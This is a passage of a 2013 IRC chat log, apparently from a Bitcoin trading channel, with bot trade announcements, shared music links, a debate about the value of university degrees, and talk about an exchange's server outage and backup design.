04:36:58 <assbot> [HAVELOCK] [AM1] 1 @ 0.65 BTC [+] Oct 28 04:41:02 <assbot> [HAVELOCK] [HIM] 10 @ 0.07611699 = 0.7612 BTC [+] {5} Oct 28 04:42:03 <assbot> [HAVELOCK] [AM1] 3 @ 0.65798996 = 1.974 BTC [+] {2} Oct 28 04:43:04 <assbot> [HAVELOCK] [HIM] 7 @ 0.07628999 = 0.534 BTC [+] {2} Oct 28 05:03:06 <Vexual> elegance cannot be imitated Oct 28 05:04:25 <assbot> [HAVELOCK] [AM100] 154 @ 0.00537062 = 0.8271 BTC [-] {6} Oct 28 05:05:32 <Vexual> and there are no terms of reference but itself Oct 28 05:06:27 <assbot> [HAVELOCK] [NEOBEE] 1098 @ 0.00272996 = 2.9975 BTC [-] Oct 28 05:11:26 <Vexual> stick that in your machine learning and smoke it Oct 28 05:16:44 <darby> ai is the new ui Oct 28 05:17:05 <Vexual> derp Oct 28 05:17:38 <assbot> [HAVELOCK] [AM1] 46 @ 0.56210001 = 25.8566 BTC [-] {10} Oct 28 05:19:14 <Vexual> google dumbed down their systems 2 years ago to appear to have progressed. it's the state of misinfo Oct 28 05:21:42 <assbot> [HAVELOCK] [AM1] 11 @ 0.55002727 = 6.0503 BTC [-] {3} Oct 28 05:23:56 <darby> interesting tactic Oct 28 05:24:52 <Vexual> even nsa dont have one hundred thosadnth of a good brain Oct 28 05:32:53 <assbot> [HAVELOCK] [AM1] 1 @ 0.55001 BTC [-] Oct 28 05:32:55 <assbot> [HAVELOCK] [AM100] 38 @ 0.00528008 = 0.2006 BTC [+] Oct 28 05:33:05 <Vexual> http://www.youtube.com/watch?v=KDZrVzoKM7Q Oct 28 05:33:06 <ozbot> RITA MARLEY "That's The Way Jah Jah Planned It" Paradiso, Amsterdam 2010 - YouTube Oct 28 05:33:53 <assbot> [HAVELOCK] [AM1] 3 @ 0.55001 = 1.65 BTC [-] Oct 28 05:34:30 <darby> praise jah Oct 28 05:35:21 <Vexual> satoshi too Oct 28 05:35:56 <assbot> [HAVELOCK] [B] [XBOND] 184 @ 0.00110832 = 0.2039 BTC [-] Oct 28 05:37:57 <assbot> [HAVELOCK] [SMG] 1565 @ 0.00011001 = 0.1722 BTC [-] Oct 28 05:47:27 <Vexual> http://www.youtube.com/watch?v=tvy5TGLUls8 Oct 28 05:47:28 <ozbot> Damian "Jr. Gong" Marley - Set Up Shop - YouTube Oct 28 06:05:25 <assbot> [HAVELOCK] [AM1] 4 @ 0.5525 = 2.21 BTC [+] {2} Oct 28 06:06:25 <assbot> [HAVELOCK] [AM1] 1 @ 0.54000001 BTC [-] Oct 28 06:08:28 <assbot> [HAVELOCK] [AM1] 5 @ 0.5304 = 2.652 BTC [-] {3} Oct 28 06:13:25 <Vexual> http://www.youtube.com/watch?v=OsBivcKbOGI Oct 28 06:13:25 <ozbot> The Streets - Turn the Page - YouTube Oct 28 06:19:20 <darby> i'll contribute Oct 28 06:19:24 <darby> http://www.youtube.com/watch?v=gkS0yUxZ-go Oct 28 06:19:24 <ozbot> rhythm & sound w/ tikiman - jah rule - YouTube Oct 28 06:20:13 <Vexual> ill interrrupt joss stone for your cool handle darby Oct 28 06:20:49 <Vexual> success of a human hive, i like it Oct 28 06:23:35 <Vexual> now the patterns in one mans greay soup tell me i like you Oct 28 06:25:37 <darby> :) Oct 28 06:26:46 <assbot> [HAVELOCK] [NEOBEE] 2229 @ 0.00258009 = 5.751 BTC [-] {11} Oct 28 06:26:50 <Vexual> two lists and a delicate interface, wait and see what i do with 80 bytes Oct 28 06:28:48 <assbot> [HAVELOCK] [AM100] 115 @ 0.0052809 = 0.6073 BTC [-] {4} Oct 28 06:29:09 <Vexual> http://www.youtube.com/watch?v=e4UJLHFkWZ8 Oct 28 06:29:10 <ozbot> Yes Sir Boss ft Joss Stone - Come Together - YouTube Oct 28 06:29:40 <KRS1> http://www.youtube.com/watch?v=xlCmQcRPtRg Oct 28 06:29:40 <ozbot> Damian Marley - Welcome To Jamrock - YouTube Oct 28 06:32:52 <assbot> [HAVELOCK] [AM1] 34 @ 0.52994117 = 18.018 BTC [-] {3} Oct 28 06:35:02 <Vexual> tropical varieties are still a rarity, but i think pankkake has something called pif? Oct 28 06:40:07 <Vexual> http://www.youtube.com/watch?v=lUwDx8HO11c Oct 28 06:40:07 <ozbot> Cypress Hill feat Method Man & Redman - Red Meth & B - YouTube Oct 28 06:46:28 <Vexual> 鮫皮?):same-kawa Oct 28 06:53:10 <Vexual> kanos avatar is still an offence to my schooling Oct 28 06:56:25 <Vexual> now that my master is dead by the blade of his son Oct 28 07:01:20 <assbot> [HAVELOCK] [AM100] 209 @ 0.00549999 = 1.1495 BTC [+] {2} Oct 28 07:04:23 <assbot> [HAVELOCK] [AM1] 2 @ 0.55 = 1.1 BTC [+] Oct 28 07:05:59 <Vexual> it sits in a police station Oct 28 07:06:48 <Vexual> it should be melted and cast to sea Oct 28 07:07:26 <assbot> [HAVELOCK] [AM1] 3 @ 0.52113333 = 1.5634 BTC [-] {3} Oct 28 07:07:39 <Vexual> pon a savage wind Oct 28 07:11:47 <Vexual> http://www.youtube.com/watch?v=XXAVYlGRIqc Oct 28 07:11:47 <ozbot> Tricky - Brand New You're Retro (live 1995) - YouTube Oct 28 07:15:05 <Vexual> http://www.youtube.com/watch?v=i3fd4nE8OCI Oct 28 07:15:05 <ozbot> Tricky - Murder Weapon (2010) - YouTube Oct 28 07:20:38 <assbot> [HAVELOCK] [AM100] 100 @ 0.0053202 = 0.532 BTC [-] {2} Oct 28 07:22:10 <mircea_popescu> http://xkcd.com/1172/ Oct 28 07:22:11 <ozbot> xkcd: Workflow Oct 28 07:22:40 <assbot> [HAVELOCK] [AM100] 107 @ 0.00532023 = 0.5693 BTC [+] {2} Oct 28 07:23:54 <Vexual> looks like a fax Oct 28 07:25:19 <Vexual> http://www.youtube.com/watch?v=E3R_3h6zQEs Oct 28 07:25:19 <ozbot> Tricky - 'Hell Is Round the Corner' - YouTube Oct 28 07:27:59 <Vexual> my master tagt me the finer parts of linux, cad, fine art, sailing, swordsmanship and judo Oct 28 07:28:35 <Vexual> also cheaper motorcycles and native relations Oct 28 07:29:21 <Vexual> http://www.youtube.com/watch?v=mdbk0R2riCc Oct 28 07:29:21 <ozbot> Billy Bunks - Hookers - YouTube Oct 28 07:36:13 <Vexual> avoid war Oct 28 07:36:57 <Vexual> http://www.youtube.com/watch?v=jHo7zyXqFsI Oct 28 07:36:57 <ozbot> Tornts - Don't Like Ya Shit [feat. Billy Bunks] - YouTube Oct 28 07:39:37 <Vexual> kano Oct 28 07:41:11 <Vexual> its all a grand tapestryu Oct 28 07:42:00 <assbot> [HAVELOCK] [VTX] 5 @ 0.31500014 = 1.575 BTC [-] Oct 28 07:46:01 <dub> http://www.youtube.com/watch?v=4ElJ9wQllJ0 Oct 28 07:46:02 <ozbot> Waltzing Matilda - YouTube Oct 28 07:46:23 <Vexual> you're full of funny ideas Oct 28 07:48:29 <Vexual> good mix tho Oct 28 07:48:56 <Vexual> korean 3d Oct 28 07:50:47 <dub> this is awesome http://www.youtube.com/watch?v=4ElJ9wQllJ0&t=2m27s Oct 28 07:51:44 <Vexual> this wis ulti mately betterer Oct 28 07:51:45 <Vexual> http://www.youtube.com/watch?v=5j16RlNtyBE Oct 28 07:51:45 <ozbot> Woodstock 1969 - Canned Heat - On The Road Again - YouTube Oct 28 08:03:16 <Vexual> dub you win some aussie goodness for being so clever with korean 3d Oct 28 08:03:20 <assbot> [HAVELOCK] [NEOBEE] 192 @ 0.00259999 = 0.4992 BTC [+] Oct 28 08:03:50 <Vexual> thisll make goat quit Oct 28 08:03:54 <Vexual> http://www.youtube.com/watch?v=FJjYc2qqNNg Oct 28 08:03:54 <ozbot> Pop Porn - Regurgitator - YouTube Oct 28 08:04:21 <assbot> [HAVELOCK] [NEOBEE] 421 @ 0.0026 = 1.0946 BTC [+] Oct 28 08:07:05 <Vexual> blame it on the cosmic rays Oct 28 08:08:25 <assbot> [HAVELOCK] [AM1] 4 @ 0.5895 = 2.358 BTC [+] {2} Oct 28 08:10:27 <assbot> [HAVELOCK] [NEOBEE] 100 @ 0.0026 = 0.26 BTC [+] Oct 28 08:11:28 <assbot> [HAVELOCK] [B] [XBOND] 100 @ 0.00114789 = 0.1148 BTC [+] Oct 28 08:22:51 <Vexual> http://www.youtube.com/watch?v=Jcu1AHaTchM Oct 28 08:22:51 <ozbot> Flight Facilities - Clair De Lune (feat. Christine Hoberg) - YouTube Oct 28 08:32:49 <assbot> [HAVELOCK] [AM1] 1 @ 0.5994986 BTC [+] Oct 28 08:42:59 <assbot> [HAVELOCK] [AM1] 1 @ 0.59949839 BTC [-] Oct 28 08:44:01 <assbot> [HAVELOCK] [HIM] 2 @ 0.0762 = 0.1524 BTC [-] Oct 28 08:45:01 <assbot> [HAVELOCK] [NEOBEE] 50 @ 0.0026 = 0.13 BTC [+] Oct 28 08:51:07 <assbot> [HAVELOCK] [NEOBEE] 46 @ 0.0026 = 0.1196 BTC [+] Oct 28 09:27:42 <assbot> [HAVELOCK] [CFIG] 4 @ 0.17777 = 0.7111 BTC [-] Oct 28 09:31:47 <assbot> [HAVELOCK] [B] [XBOND] 244 @ 0.0011479 = 0.2801 BTC [+] Oct 28 09:33:48 <assbot> [HAVELOCK] [NEOBEE] 72 @ 0.0027 = 0.1944 BTC [+] Oct 28 09:41:56 <assbot> [HAVELOCK] [AM1] 2 @ 0.5728 = 1.1456 BTC [-] Oct 28 10:06:21 <assbot> [MPEX] [TEST] 987654321 @ 1.23456789 = 1219326311.1264 BTC Oct 28 10:19:30 <jurov> hm, mpex still fscking... Oct 28 10:26:42 <mircea_popescu> jurov on the 2nd disk ;/ **** ENDING LOGGING AT Mon Oct 28 11:31:12 2013 **** BEGIN LOGGING AT Mon Oct 28 17:46:09 2013 Oct 28 17:46:11 <mircea_popescu> well that was painful. Oct 28 17:48:09 <nubbins`> i've got this condition where it's really difficult for me to find the ketchup in the fridge Oct 28 17:49:43 <abracadabra> put a big yellow flag on the ketchup bottle Oct 28 17:51:04 <assbot> [HAVELOCK] [B] [XBOND] 1834 @ 0.0011 = 2.0174 BTC [-] Oct 28 17:53:11 <bob_> omg mpex is back. Oct 28 17:53:15 <bob_> almost. Oct 28 17:53:58 <Azelphur> mpex fought the law and the...mpex won Oct 28 17:54:08 <bob_> almost. some stuff is weird. Oct 28 17:54:54 <nubbins`> abracadabra: i seriously searched for 30 minutes last night. open the fridge this morning, ketchup sitting alone on the bottom shelf Oct 28 17:54:59 <bob_> heh. the s.nsa ipo is back on! Oct 28 17:57:19 <bob_> looks like 10 days of data missing. well, those trades probably weren't important anyway :D Oct 28 18:01:07 <mircea_popescu> bob they're just not showing. Oct 28 18:01:20 <mircea_popescu> also trade is not active atm. Oct 28 18:02:08 <the20year> what exchanges are working decently? Oct 28 18:03:24 <nubbins`> mircea_popescu: one of the big problems with higher education is that students think "ok, i just attend these classes, get this degree, and i'm employable", which is just not true. getting a university degree, college diploma, whatever, doesn't mean you're employable, doesn't mean you have skills, doesn't mean you know how to do anything besides graduate from a program. the value isn't in the degre Oct 28 18:03:24 <nubbins`> or the individual classes, the value is being in an environment where you have ready access to the tools you need to educate *yourself*. nobody understands this anymore, and so they just show up and mope through classes and go home, not communicating with people who could offer advice, not seeking out opportunities to gain useful knowledge. just going through the motions and passing tests until the Oct 28 18:03:25 <nubbins`> get a sheet of paper that says "B.Sc. (hons)", and then working a shit retail job until one day they realize (or not) what they should have been doing all along Oct 28 18:04:27 <nubbins`> and it takes a 3 minute job interview to separate those who went through the motions from those who took the opportunity to educate themselves Oct 28 18:05:52 <pankkake> getting drunk with friends were the best learning experiences I got from higher education Oct 28 18:06:07 <pankkake> well, and the internships Oct 28 18:06:25 <pankkake> didn't even bother coming back for the diplomas Oct 28 18:06:30 <nubbins`> spending six years learning that i didn't want to spend the rest of my life working in an office was the best learning experience i got Oct 28 18:06:44 <nubbins`> very, very expensive lesson, but sometimes it must be so Oct 28 18:07:53 <KRS-> nubbins: not sure if you went to college or not, I did and I learned a lot. A lot of what you said is true, but you can't discount a degree someone has attained. Oct 28 18:07:54 <jurov> so... since mpex now advises to vent our rage here... y u no backup machine mircea??? Oct 28 18:08:45 <nubbins`> KRS-: i spent 6 years in university. i'm discounting the notion that possession of a degree automatically confers knowledge, wisdom, or experience. :) Oct 28 18:09:19 <nubbins`> i know lots of very intelligent university-educated people, but i also know some complete fucking morons with the same credentials Oct 28 18:09:38 <KRS-> Ok I see what you are saying and you are right. Those who are just good test takers who finished a program stick out like a sore thumb imo. Oct 28 18:09:49 <bob_> certainly not experience, but it does generally mean some knowledge. Oct 28 18:09:54 <KRS-> Most of the time you can tell just by talking to them. Oct 28 18:10:06 <pankkake> I wouldn't employ most of the people who got the diplomas I got Oct 28 18:10:19 <bob_> CS majors know what O(n) means. English majors who taught themselves html do not. Oct 28 18:10:22 <jurov> nubbins`: i'd reject such advice before my 3rd uni year as outright blasphemous Oct 28 18:10:33 <nubbins`> well, that's the problem. kids are throwing tens of $ away, under the impression that it will make a difference in their lives. but unless they have the drive to take what they want and the self-awareness to know what it is, it'll never be anything more than a costly waste of time for them Oct 28 18:11:03 <the20year> I'm still pretty happy with the fact I have never attended formal college Oct 28 18:11:11 <nubbins`> tens of $? lel. tens of thousands of $ Oct 28 18:11:24 <bob_> 100's. Oct 28 18:11:28 <nubbins`> this is why a bachelor's degree is the new standard for employability Oct 28 18:11:32 <nubbins`> because everyone has one Oct 28 18:11:39 <the20year> I wonder how much that piece of paper would cost me Oct 28 18:11:47 <nubbins`> completely avoiding the fact that they're as useless now as a HS diploma was not long ago Oct 28 18:12:06 <mircea_popescu> jurov because at some point your system is either cenrtralised or it isn't. Oct 28 18:12:36 <jurov> btw, i'd happily employ genial teenagers.. but how to find them and how to keep them motivated for my cause? Oct 28 18:12:44 <the20year> Develop a hiring system Oct 28 18:12:45 <KRS-> the20year: cost me $60 I got 2% for 12 years financing still paying lol Oct 28 18:12:50 <nubbins`> you can't "keep" people motivated Oct 28 18:12:53 <mircea_popescu> you know genial = friendly, happy people. genius is prolly what you mean Oct 28 18:13:02 <KRS-> $60K Oct 28 18:13:08 <jurov> the20year: can you elaborate? Oct 28 18:13:28 <nubbins`> ah a hiring system. why has nobody thought of this! Oct 28 18:14:00 <nubbins`> can part of the system be "nobody gives a fuck if you have a degree" Oct 28 18:15:28 <assbot> [HAVELOCK] [B] [XBOND] 400 @ 0.0011 = 0.44 BTC [-] Oct 28 18:15:37 <nubbins`> anyway. walk around any campus and ask some young faces why they're there. see how many say "because my parents expect this of me". see how many are thinking the same but are ashamed to admit it. Oct 28 18:15:44 <nubbins`> can you think of a bigger waste of money? or TIME? Oct 28 18:16:11 <the20year> Personally, i try and develop a plan of finding people who can be motivated, either by time or money, then provide a roadmap so they can see how they will gain good income for working with me over a set period of time Oct 28 18:16:12 <jurov> as compared to? Oct 28 18:16:17 <jurov> nubbins`: ^ Oct 28 18:16:41 <the20year> I hate hourly pay, so what I typically offer is contract pricing, pay-for-performace models, so as they get better ,their wages automatically increase, and then if they don't work well they'll quit on their own without dragging down the company too much Oct 28 18:16:44 <nubbins`> as compared to spending time figuring out what you want from life Oct 28 18:16:46 <jurov> the20year: the coworking space i'm affiliated to, is trying exactly this Oct 28 18:16:53 <jurov> and it is all but easy Oct 28 18:16:56 <the20year> That's how I run RentalStarter, working with contractors Oct 28 18:17:09 <the20year> Hit the goals? You get a bonus. Miss them? You make less money Oct 28 18:17:10 <nubbins`> university is just a 4 (or more) year extension on the autopilot that's been running these kids' lives Oct 28 18:17:20 <the20year> Pretty much, they do what they're told without thinking Oct 28 18:17:38 <the20year> My cousin went to school for history, then he realized he can't get a job there, so now he's getting another degree in logistics Oct 28 18:17:38 <jurov> again, what alternative do you suggest? Oct 28 18:18:02 <the20year> I asked him "Who are you applying to after college" and he didn't think he could get employed ,even though a logistics degree is amazing to have Oct 28 18:18:03 <assbot> AMAZING COMPANY! Oct 28 18:18:11 <the20year> Build a business, learn to run it Oct 28 18:18:21 <jurov> you know, just telling them this outright does *not* work Oct 28 18:18:25 <nubbins`> i suggest not going to university. at least, not until you know what the fuck you want and have at least a general idea of how to get it Oct 28 18:18:51 <nubbins`> but suggestions are advice, and the funny thing about advice is that nobody wants to hear it until they're ready Oct 28 18:18:59 <the20year> Very true Oct 28 18:19:10 <nubbins`> and nobody's ready until they've sunk $60k into a degree in german film, or history, or biology Oct 28 18:19:12 <jurov> i could have had a business, even in opensource development long ago (nerd's wet dream i guess), but was afraid how to explain to everyone around Oct 28 18:19:30 <the20year> So why couldn't you explain it? Oct 28 18:20:02 <jurov> because...how it can be more important than school? Oct 28 18:20:15 <nubbins`> EVERYTHING IS MORE IMPORTANT THAN SCHOOL Oct 28 18:20:25 <the20year> Most will have to learn the hard way Oct 28 18:20:32 <nubbins`> NOBODY REALIZES THIS Oct 28 18:20:46 <the20year> I ask people to spend no less than 30 hours of research on the degree they want, speicifcally in how it will improve employability Oct 28 18:20:59 <the20year> I don't know how many people I know with psycology degrees who are flipping burgers still Oct 28 18:21:11 <nubbins`> science degrees are the biggest trick of all Oct 28 18:21:11 <jurov> also, i was not able to put consistent work output then due to psych problems Oct 28 18:21:19 <the20year> And I asked them all "When you saw that the unemployment rate for someone with that degree is 20% or more, why did you think it was a good idea?" Oct 28 18:21:27 <nubbins`> what the fuck are you gonna do with a biology degree? become a biologist? Oct 28 18:21:37 <nubbins`> great, how about the other 200 people in your graduating class? Oct 28 18:21:43 <nubbins`> working at pet stores and Liquor Mart Oct 28 18:22:01 <jurov> but they can't get somewhere where they have maths! even if their life depends on it... Oct 28 18:22:46 <nubbins`> now, to be fair, i'm squarely in the group of people who figured this all out after the fact Oct 28 18:22:53 <nubbins`> so it's not like i did things the smart way Oct 28 18:23:19 <nubbins`> but in my defense, i was told that this shit was basically a golden ticket Oct 28 18:23:26 <nubbins`> what a lel that was Oct 28 18:24:13 <nubbins`> the other half of this is that people tend to settle. "well, i'm done school, no more learning for me" Oct 28 18:24:30 <nubbins`> and they just stop taking in new information and learning new skills Oct 28 18:24:43 <KRS-> big mistake Oct 28 18:25:05 <nubbins`> that's almost worse, spinning your wheels so slowly that you don't even notice you're sinking into the mud Oct 28 18:25:09 <KRS-> thats what makes the difference between a ceo and someone who spends their life in their entry-level position Oct 28 18:25:13 <nubbins`> yes Oct 28 18:26:28 <nubbins`> but i think the problem in a lot of cases is that people just don't want anything Oct 28 18:26:35 <nubbins`> they're content to just float along Oct 28 18:26:46 <the20year> yep Oct 28 18:26:54 <the20year> Why not? The government will take care of them Oct 28 18:27:05 <nubbins`> every now and then they have an attack of guilt at the waste their life has become, but why dwell on that when it would take so much effort to change! Oct 28 18:27:16 <the20year> in modern society there's no problem, punishment or negative towards someone who doesn't want to do anything with life Oct 28 18:28:33 <bob_> not everything is more important than school. i'm looking at a resume right now that does not have a college listed, but does have that he attended "tony robbins - power to influence" Oct 28 18:28:46 <bob_> i'd rather see a degree Oct 28 18:31:44 <assbot> [HAVELOCK] [AM100] 134 @ 0.00550271 = 0.7374 BTC [-] {7} Oct 28 18:32:45 <assbot> [HAVELOCK] [AM100] 266 @ 0.00530292 = 1.4106 BTC [-] {8} Oct 28 18:34:47 <assbot> [HAVELOCK] [AM100] 60 @ 0.00579997 = 0.348 BTC [+] Oct 28 18:38:33 <nubbins`> the20year: let me find you a quote Oct 28 18:39:10 <the20year> "Nothing in the world can take the place of Persistence. Talent will not; nothing is more common than unsuccessful men with talent. Genius will not; unrewarded genius is almost a proverb. Education will not; the world is full of educated derelicts. Persistence and determination alone are omnipotent. The slogan 'Press On' has solved and always will solve the problems of the human race." Oct 28 18:39:57 <bob_> yeah, i think tony robbins said that. Oct 28 18:40:53 <assbot> [HAVELOCK] [AM100] 61 @ 0.00540004 = 0.3294 BTC [-] Oct 28 18:41:48 <nubbins`> "The Brutor takes pride in the troubles of their life because it all adds to their stature. They marvel at failure, such as bad grades in school, or getting hassled by cops who tell them only to move along. ... Any punishment for his actions becomes a badge and holds no real consequence because jail is holding him back from nothing but killing time" Oct 28 18:41:49 <the20year> Calvin Coolidge Oct 28 18:44:47 <bob_> http://www.youtube.com/watch?v=NYYp0TgNfGE Oct 28 18:44:48 <ozbot> Anthony Robbins- Tony Robbins Persist to Achieve - YouTube Oct 28 18:44:57 <assbot> [HAVELOCK] [HIM] 100 @ 0.05611302 = 5.6113 BTC [-] {8} Oct 28 18:48:00 <assbot> [HAVELOCK] [KCIM] 1 @ 0.399 BTC [+] Oct 28 18:48:33 <jurov> bullshit Oct 28 18:49:05 <jurov> it's impossible to some day decide "i'll be persistent" and stick to it for years Oct 28 18:49:41 <mircea_popescu> why ? Oct 28 18:49:44 <nubbins`> correct. persistence is a skill like any other Oct 28 18:49:48 <jurov> if you're otherwise happe and satiated Oct 28 18:49:50 <nubbins`> you need to work on it Oct 28 18:49:52 <jurov> *happy Oct 28 18:50:09 <nubbins`> jurov: happy and satiated are not synonyms Oct 28 18:50:21 <jurov> i did not say that Oct 28 18:50:44 <nubbins`> you came pretty close Oct 28 18:50:55 <nubbins`> many people are unhappy, yet satiated Oct 28 18:51:07 <nubbins`> that's what leads to change Oct 28 18:51:27 <nubbins`> being happy *and* satiated? you've got it knocked. don't change a thing. Oct 28 18:51:30 <jurov> man starts very unhappy or hungry. then one sets their goals to prevent it happening again Oct 28 18:51:43 <KRS-> a degree at the very least shows that someone can stick to something and complete it..for that, comes some value. as a hiring manager i'd rather see a degree. Oct 28 18:52:02 <nubbins`> KRS-: arguably the only concrete value a degree holds Oct 28 18:52:27 <nubbins`> but there are plenty of other ways to prove that Oct 28 18:52:28 <KRS-> the importance them comes down to whether or not you can tell if someone is just a good test taker or actually has knowledge and knows how to apply it Oct 28 18:52:48 <nubbins`> yes! Oct 28 18:53:02 <nubbins`> how many interviewees see it as yet another test that they must figure out how to pass Oct 28 18:53:14 <nubbins`> wholly missing the point of the entire exercise Oct 28 18:53:28 <nubbins`> and ending up in an unsatisfying job? Oct 28 18:53:43 <KRS-> but how many times have people been hired just because they can spit good game at an interview only to find out they are incompetent jerkoffs Oct 28 18:53:54 <nubbins`> plenty of those around, too Oct 28 18:54:16 <KRS-> salesmen come to mind Oct 28 18:54:44 <nubbins`> i used to work with a girl who had a B.Eng. with honors, and she wrote the worst code i've ever seen. variables called "resultset1" and "string3", seriously Oct 28 18:54:59 <nubbins`> "why the fuck did you guys hire her?" Oct 28 18:55:05 <nubbins`> "she was great in the interview" Oct 28 18:55:14 <kakobrekla> tits? Oct 28 18:55:28 <nubbins`> irrelevant, but no Oct 28 18:55:30 <the20year> interview = sacj Oct 28 18:55:31 <the20year> '*sack Oct 28 18:55:45 <nubbins`> no, she was just smart on paper and knew how to interview Oct 28 18:56:01 <KRS-> pfft Oct 28 18:56:08 <assbot> [HAVELOCK] [AM100] 39 @ 0.00540004 = 0.2106 BTC [-] {2} Oct 28 18:56:33 <nubbins`> but that didn't quite overcome her crippling lack of social skills or job knowledge Oct 28 18:56:42 <nubbins`> go figure Oct 28 18:56:47 <dexX7> http://www.nasdaq.com/markets/ipos/company/winklevoss-bitcoin-trust-909930-72927 Oct 28 18:56:47 <ozbot> WINKLEVOSS BITCOIN TRUST IPO - NASDAQ.com Oct 28 18:57:34 <the20year> Nice Oct 28 18:58:00 <jurov> mircea_popescu: seems my rant about not having spare machine for mpex got lost Oct 28 18:58:19 <jurov> but i insist, why you have to wait for The One Holy Server to be rebuilt? Oct 28 18:59:08 <nubbins`> <mircea_popescu> jurov because at some point your system is either cenrtralised or it isn't. Oct 28 19:00:14 <kakobrekla> yeah but reduncancy doenst have to kill centralisation Oct 28 19:00:19 <kakobrekla> ba Oct 28 19:00:36 <jurov> nubbins` how it precludes having regularly updated spare server? Oct 28 19:00:45 <mircea_popescu> kakobrekla the problem is centralisation + security as a combo. Oct 28 19:01:06 <nubbins`> jurov: shrug, i only paste ;) Oct 28 19:01:07 <mircea_popescu> you CAN seamlessly failover on errors, if the result of errors is nil and convenience of not having errors is what counts. Oct 28 19:01:19 <mircea_popescu> however, if the result of errors is not nil, you can't just shrug and move on Oct 28 19:01:54 <mircea_popescu> in my case, i have to, everytime something unexpected happens, see why the fuck it happened before i can move on Oct 28 19:02:08 <nubbins`> or, put another way, a backup box is no good if it's a backup of a compromised machine Oct 28 19:02:13 <mircea_popescu> exactly. Oct 28 19:03:44 <kakobrekla> well there you have it jurov! Oct 28 19:03:50 <kakobrekla> :> Oct 28 19:05:14 <jurov> hm... so next time psu or raid controller dies, we'll be few days offline, again. cuz it could been a hack? Oct 28 19:05:19 <bob_> right, but, if you had a backup, once you decided it was just a power problem that fried your drive, you could recover faster. Oct 28 19:05:24 <mircea_popescu> what do you want me to do ;/ Oct 28 19:05:27 <bob_> ^ what jurov said Oct 28 19:05:31 <mircea_popescu> last time it was a motherfucking "hack" Oct 28 19:05:39 <mircea_popescu> or w/e successful social engineering Oct 28 19:06:01 <nubbins`> hm, bob makes a point Oct 28 19:06:12 <mircea_popescu> bob_ yes, in principle. see, here's the thing : the more complex the security model becomes, by that very fact the more complex recovery processes become Oct 28 19:06:15 <mircea_popescu> this is unavoidalbe. Oct 28 19:06:40 <mircea_popescu> at some point the dilemma is, "either people will complain becauyse it takes too long, or people will complain because x edge case wasn't covered in the security design" Oct 28 19:06:46 <mircea_popescu> also unavoidable. Oct 28 19:07:23 <bob_> agreed with the theory, but in practice you could probably reduce the downtime with some improvements to architecture. Oct 28 19:07:23 <jurov> i mean, if you can do process with one machine, you can do the same with the second one with small marginal costs Oct 28 19:07:33 <lewicki> .d Oct 28 19:07:33 <ozbot> 390928787.63809 | Next Diff in 1552 blocks | Estimated Change: 24.0238% in 8d 4h 7m 29s Oct 28 19:07:35 <jurov> to have at least hardware fails covered Oct 28 19:08:03 <mircea_popescu> jurov yes, but then at some point you have machines in disagreement. how do you resolve this ? Oct 28 19:08:20 <mircea_popescu> also, machines don't cost 0. Oct 28 19:08:38 <mircea_popescu> so would you have a faster & better main server, or a shittier main so the back-up is there ? Oct 28 19:08:57 <mircea_popescu> depends, right ? if you never have catastrophic failures of the sort, the incremental gain from the better server is everyone's benefit. Oct 28 19:09:11 <mircea_popescu> however, if you do noboduy cares you were < .1 seconds forever, cause well... days offline. Oct 28 19:09:46 <jurov> well i'm all for shitty servers, and lots of them... you gonna scale up and hadle faults quickly someday anyway Oct 28 19:10:19 <mircea_popescu> anwyay, mpex is very much an adaptive beast. it's the best i can do, honestly, because i don't know the correct way to build bitcoin systems Oct 28 19:10:21 <assbot> [HAVELOCK] [HIM] 130 @ 0.05510001 = 7.163 BTC [-] {2} Oct 28 19:10:26 <mircea_popescu> i daresay nobody does. we're finding out. Oct 28 19:10:37 <bob_> we are trying to figure that out :) since you don't allow high-frequency trading anyway, nobody cares if it's < .1 seconds or < .2 seconds. Oct 28 19:11:00 <Namworld> I'm alive Oct 28 19:11:31 <jurov> hi Namworld Oct 28 19:11:35 <mircea_popescu> bob_ except when ipo or w/e Oct 28 19:11:51 <mircea_popescu> yes, 99% of the time 99% of your shit isn't at work / needed. Oct 28 19:12:56 <kakobrekla> im just joking btw. i dont have a license to drive a bus. Oct 28 19:14:49 <bob_> so given that security is the most important thing, and we all understand the complexities involved, I think we can still agree that 2 days down for a failed hard drive probably warrents a blame-less post mortem with the goal of improving the system for the future? Oct 28 19:15:49 <mircea_popescu> blameless or blameful, you know ? what can i do, i'm doing it. Oct 28 19:15:56 <bob_> blameless. Oct 28 19:16:09 <bob_> glad to hear :) Oct 28 19:16:12 <mircea_popescu> but for all the shortcomings of distributed models, which exist, the centralised model has its problems. Oct 28 19:19:02 <jurov> well, just sayin'. maybe you study all chips with electron microscope and then second machine would really double whole expense... Oct 28 19:19:42 <mircea_popescu> well, see, before the 2nd drive went in and got fried, i had already sent the 1st to be cut up Oct 28 19:19:57 <mircea_popescu> so now i will get a pretty expensive lab bill saying "power fluctuations caused bla bla bla" Oct 28 19:24:24 <nubbins`> http://books.google.ca/books?id=f8gTJ3-MWzEC&pg=PA288 Oct 28 19:24:28 <nubbins`> paragraphs 2-4 Oct 28 19:24:36 <nubbins`> never trust a computer Oct 28 19:26:26 <pankkake> is it any good? I only read the Frank Herbert originals Oct 28 19:27:18 <nubbins`> a lot of people who like Frank's really dislike Brian's, but i enjoyed it Oct 28 19:27:45 <lurker> not the same style, not the same depth - forget the herbert name and it's decent Oct 28 19:27:55 <nubbins`> ^ Oct 28 19:28:00 <pankkake> I see. thanks Oct 28 19:31:43 <assbot> [HAVELOCK] [HIM] 150 @ 0.07374266 = 11.0614 BTC [+] {3} Oct 28 19:36:48 <assbot> [HAVELOCK] [HIM] 90 @ 0.075 = 6.75 BTC [+] Oct 28 19:40:33 <nubbins`> http://imgur.com/Q61qWo3 Oct 28 19:42:56 <dexX7> omg :D Oct 28 19:43:11 <nubbins`> cant stop laughing Oct 28 19:47:59 <assbot> [HAVELOCK] [HIM] 24 @ 0.074 = 1.776 BTC [-] Oct 28 19:49:00 <assbot> [HAVELOCK] [HIM] 100 @ 0.075 = 7.5 BTC [+] Oct 28 19:50:01 <assbot> [HAVELOCK] [HIM] 10 @ 0.075 = 0.75 BTC [+] Oct 28 19:51:03 <assbot> [HAVELOCK] [AM100] 100 @ 0.00530115 = 0.5301 BTC [+] {2} Oct 28 19:52:03 <assbot> [HAVELOCK] [AM100] 96 @ 0.00530073 = 0.5089 BTC [-] {2} Oct 28 20:05:07 <kakobrekla> better http://imgur.com/a/usnAh Oct 28 20:06:07 <wao> :D Oct 28 20:15:46 <ThickAsThieves> http://buttcoin.org/cringiest-bitcoin-video-ever Oct 28 20:19:00 <kleeck> Oh... no. Oct 28 20:19:05 <kleeck> I just 